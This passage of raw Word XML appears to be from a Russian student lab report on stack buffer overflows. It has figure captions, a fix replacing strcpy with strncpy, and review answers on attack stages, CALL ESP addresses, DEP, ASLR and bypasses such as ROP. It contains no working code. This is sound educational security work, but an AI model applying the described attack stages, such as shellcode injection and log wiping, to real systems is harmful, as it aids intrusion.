        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AB6341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13</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ключ до запуска программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC29FF" w14:textId="77777777" w:rsidR="00AB6341" w:rsidRDefault="00AB6341" w:rsidP="00AB6341"/>
    <w:p w14:paraId="42486D71" w14:textId="77777777" w:rsidR="00AB6341" w:rsidRDefault="00AB6341" w:rsidP="00AB6341">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31FF8AC0" wp14:editId="0CCDBB37">
            <wp:extent cx="3559215" cy="1754497"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="116341273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273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5281" cy="17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2CA3" w14:textId="648C125F" w:rsidR="00AB6341" w:rsidRDefault="00AB6341" w:rsidP="00AB6341">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00817816">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ключ после запуска программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A8ED9" w14:textId="77777777" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Исправление уязвимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B571A" w14:textId="32D7DAE2" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использование </w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> небезопасно, т. к. оно не учитывает то, что длина поступающей строки может быть больше исходной. Следовательно, необходимо использовать безопасную функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strncpy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, т. к. в ней изначально указывается, сколько символов необходимо скопировать. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B23374D" w14:textId="77777777" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342BC6CD" wp14:editId="6E728A65">
            <wp:extent cx="5181600" cy="1825728"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="112167783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7783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9654" cy="18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49E8" w14:textId="5CC674B1" w:rsidR="00817816" w:rsidRPr="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00817816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15</w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - исправленная программа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1730A1" w14:textId="0A9FBE90" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>При запуске исправленной программы наблюдается то, что посторонний текст отсутствует. Следовательно, шелл-код не будет выполнен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584D3F0" w14:textId="77777777" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB50A75" w14:textId="77777777" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="265DACEE" wp14:editId="0B0BE791">
            <wp:extent cx="4430495" cy="1841500"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="50425715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5715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1540" cy="18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2A77" w14:textId="153725E0" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00817816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16</w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - вывод исправленной программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD2EA7" w14:textId="77777777" w:rsidR="006970F4" w:rsidRDefault="006970F4" w:rsidP="006970F4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C38A30" w14:textId="77777777" w:rsidR="006970F4" w:rsidRDefault="006970F4" w:rsidP="006970F4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AC20FA6" wp14:editId="21DF22BB">
            <wp:extent cx="3402108" cy="1713054"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="1825830485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758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626" cy="17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783" w14:textId="419CE06D" w:rsidR="006970F4" w:rsidRDefault="006970F4" w:rsidP="006970F4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6341"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17</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ключ до запуска программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40687FE9" w14:textId="77777777" w:rsidR="006970F4" w:rsidRDefault="006970F4" w:rsidP="006970F4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B50F784" w14:textId="77777777" w:rsidR="006970F4" w:rsidRDefault="006970F4" w:rsidP="006970F4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38D41A3F" wp14:editId="3BFFC199">
            <wp:extent cx="3402108" cy="1713054"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="15678167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758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626" cy="17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D971" w14:textId="3288CCB3" w:rsidR="006970F4" w:rsidRDefault="006970F4" w:rsidP="006970F4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6341"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18</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ключ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>после</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6341">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> запуска программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8EC83" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E527B53" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F"/>
    <w:p w14:paraId="03197158" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F"/>
    <w:p w14:paraId="5078E447" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F"/>
    <w:p w14:paraId="7D9C536F" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F"/>
    <w:p w14:paraId="4E06D39E" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F"/>
    <w:p w14:paraId="1FC691F8" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F"/>
    <w:p w14:paraId="20EE3317" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRPr="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F"/>
    <w:p w14:paraId="4001A8B1" w14:textId="44998C2E" w:rsidR="004541B3" w:rsidRDefault="004541B3" w:rsidP="004541B3">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680ACC5A" w14:textId="227FA8FC" w:rsidR="00054A74" w:rsidRDefault="00054A74" w:rsidP="00054A74">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00054A74">
        <w:t>Какие основные этапы выделяют при реализации атаки, эксплуатирующей уязвимость типа "переполнение буфера"?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5B8DC" w14:textId="1ED34EAC" w:rsidR="00054A74" w:rsidRDefault="00054A74" w:rsidP="00054A74">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00054A74">
        <w:t>Почему стек является уязвимым при передаче параметров функции?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FBD68" w14:textId="3DFBFF40" w:rsidR="00054A74" w:rsidRPr="00054A74" w:rsidRDefault="00054A74" w:rsidP="00054A74">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00054A74">
        <w:t xml:space="preserve">Одинаков ли адрес инструкций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r w:rsidRPr="00054A74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="00054A74">
        <w:t xml:space="preserve"> в различных версиях операционной системы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00054A74">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3D6C5" w14:textId="65729AF9" w:rsidR="00054A74" w:rsidRPr="00054A74" w:rsidRDefault="00054A74" w:rsidP="00054A74">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00054A74">
        <w:t>Могут ли инструкции быть выполнены где-либо кроме сегмента кода? Ответ обоснуйте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F9F9C" w14:textId="61B2C50F" w:rsidR="00054A74" w:rsidRPr="00054A74" w:rsidRDefault="00054A74" w:rsidP="00054A74">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00054A74">
        <w:t xml:space="preserve">Опишите работу механизма защиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00054A74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00054A74">
        <w:t>. Каким образом он позволяет защитить систему от эксплуатации уязвимостей типа "переполнение буфера"?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0871A6" w14:textId="2B2833C0" w:rsidR="00054A74" w:rsidRDefault="00054A74" w:rsidP="00054A74">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ответы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6929C226" w14:textId="77777777" w:rsidR="0091495B" w:rsidRDefault="0091495B" w:rsidP="0091495B">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">Атака, использующая уязвимость переполнения буфера, проходит </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27399F44" w14:textId="790C551A" w:rsidR="0091495B" w:rsidRDefault="0091495B" w:rsidP="0091495B">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">несколько ключевых этапов. </w:t>
      </w:r>
      <w:r>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">Сначала выполняется разведка и анализ, где злоумышленник изучает целевую систему, версию ОС и используемое ПО, анализирует функции работы с памятью (например, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>gets(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>memcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">)) и проверяет наличие защитных механизмов (DEP, ASLR, Stack Canaries). </w:t>
      </w:r>
      <w:r>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">Затем разрабатывается эксплойт: подбираются входные данные, вызывающие переполнение, исследуются управляющие структуры памяти, создается вредоносный код, который может изменить критические области, включая адрес возврата функции. Далее происходит выполнение вредоносного кода: shellcode записывается в память, адрес возврата изменяется, после чего злоумышленник получает контроль над системой. </w:t>
      </w:r>
      <w:r>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">На следующем этапе злоумышленник может пытаться повысить привилегии и закрепиться в системе, например, создавая бэкдор. </w:t>
      </w:r>
      <w:r>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091495B">
        <w:t>Завершающим шагом является сокрытие следов атаки: удаление логов, маскировка вредоносного кода и минимизация подозрительной активности. Для защиты от подобных атак рекомендуется использовать безопасные функции работы с памятью (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>strncpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>fgets(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>), memcpy_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>s(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">)), включать защитные механизмы (DEP, ASLR, Stack Canaries), компилировать </w:t>
      </w:r>
      <w:r w:rsidRPr="0091495B">
        <w:lastRenderedPageBreak/>
        <w:t>программы с защитой (например, -fstack-protector в GCC) и ограничивать права выполняемых процессов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A952D" w14:textId="7042D7BE" w:rsidR="0091495B" w:rsidRDefault="0091495B" w:rsidP="0091495B">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0091495B">
        <w:t>Стек является уязвимым при передаче параметров функции из-за его структуры и способа работы с памятью. Когда программа вызывает функцию, в стек записываются параметры, локальные переменные и адрес возврата, который указывает, куда программа должна перейти после завершения функции. Если переданные данные превышают выделенный размер буфера, возможна их запись за границы выделенной области, что может привести к перезаписи важных данных, включая адрес возврата. Основными причинами уязвимости являются фиксированный размер буфера, отсутствие проверок границ массива в небезопасных функциях (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>gets(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>sprintf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>scanf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>)), линейная организация памяти стека, стандартный порядок хранения данных (сначала параметры, затем адрес возврата, потом локальные переменные) и отсутствие встроенной защиты в старых системах. Такие уязвимости могут привести к атакам, включая переполнение буфера в стеке (Stack Buffer Overflow) и перезапись адреса возврата (Return Address Overwrite), позволяя злоумышленнику выполнить произвольный код. Для защиты от таких атак применяются безопасные функции (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>strncpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>fgets(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0091495B">
        <w:t>)), механизмы защиты (Stack Canaries, DEP, ASLR), а также специальные компиляторные флаги (-fstack-protector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BECB98" w14:textId="02DBC9BE" w:rsidR="0091495B" w:rsidRDefault="0091495B" w:rsidP="0091495B">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0091495B">
        <w:t xml:space="preserve">Адрес инструкции CALL ESP не является одинаковым в разных версиях Windows, так как его расположение зависит от множества факторов. Во-первых, разные версии Windows имеют различную компоновку ядра, системных библиотек (kernel32.dll, ntdll.dll) и пользовательских модулей, что изменяет расположение инструкций в памяти. Во-вторых, начиная с Windows Vista, используется механизм ASLR (Address Space Layout Randomization), который случайным образом располагает исполняемые файлы и библиотеки, делая адреса инструкций, включая CALL ESP, непредсказуемыми между перезагрузками или запусками процессов. В-третьих, разные версии Windows могут компилировать системные библиотеки с различными параметрами, а </w:t>
      </w:r>
      <w:r w:rsidRPr="0091495B">
        <w:lastRenderedPageBreak/>
        <w:t>обновления и сервис-паки также могут изменять расположение инструкций. Кроме того, архитектура системы играет важную роль: 32-битные (x86) и 64-битные (x64) версии Windows имеют разную организацию памяти, а в 64-битных системах отсутствует прямой аналог инструкции CALL ESP, что усложняет стековые атаки. До появления ASLR злоумышленники могли использовать предсказуемые адреса инструкций для атак, таких как return-to-libc или SEH-based exploitation, но в современных системах успешная эксплуатация требует дополнительных методов обхода, например, ROP (Return-Oriented Programming) или поиска модулей без ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D55893B" w14:textId="03CF6956" w:rsidR="0091495B" w:rsidRDefault="00012770" w:rsidP="0091495B">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00012770">
        <w:t xml:space="preserve">Да, инструкции могут быть выполнены не только в сегменте кода, но и в других областях памяти, таких как стек, куча и сегменты данных, если защита исполнения кода не включена или успешно обойдена. По умолчанию процессор может исполнять инструкции из любой доступной памяти, если на нее передано управление. Это используется в атаках, таких как исполнение кода в стеке (Stack Execution), когда злоумышленник записывает shellcode в стек и изменяет адрес возврата функции, и исполнение кода в куче (Heap Execution), когда вредоносный код записывается в динамически выделенную область памяти. Современные системы используют защитные механизмы, такие как DEP (Data Execution Prevention), который запрещает выполнение кода в стеке и куче, и ASLR (Address Space Layout Randomization), который затрудняет предсказание адресов памяти. Однако существуют методы обхода этих защит, например, ROP (Return-Oriented Programming), который использует </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00012770">
        <w:t>уже существующие</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00012770">
        <w:t xml:space="preserve"> фрагменты кода, и JIT-Spraying, применяемый для атак на динамически компилируемые языки программирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58491106" w14:textId="4D1C5992" w:rsidR="00BD6ADE" w:rsidRPr="00BD6ADE" w:rsidRDefault="00012770" w:rsidP="00551A9F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00012770">
        <w:t xml:space="preserve">Механизм Data Execution Prevention (DEP) – это технология защиты памяти, предотвращающая выполнение кода в областях, предназначенных только для хранения данных, таких как стек и куча. Его основная цель – защитить систему от атак, использующих переполнение буфера, при которых злоумышленник записывает и затем исполняет вредоносный код в памяти, не </w:t>
      </w:r>
      <w:r w:rsidRPr="00012770">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">предназначенной для выполнения инструкций. Как работает </w:t>
      </w:r>
      <w:r w:rsidRPr="00012770">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00012770">
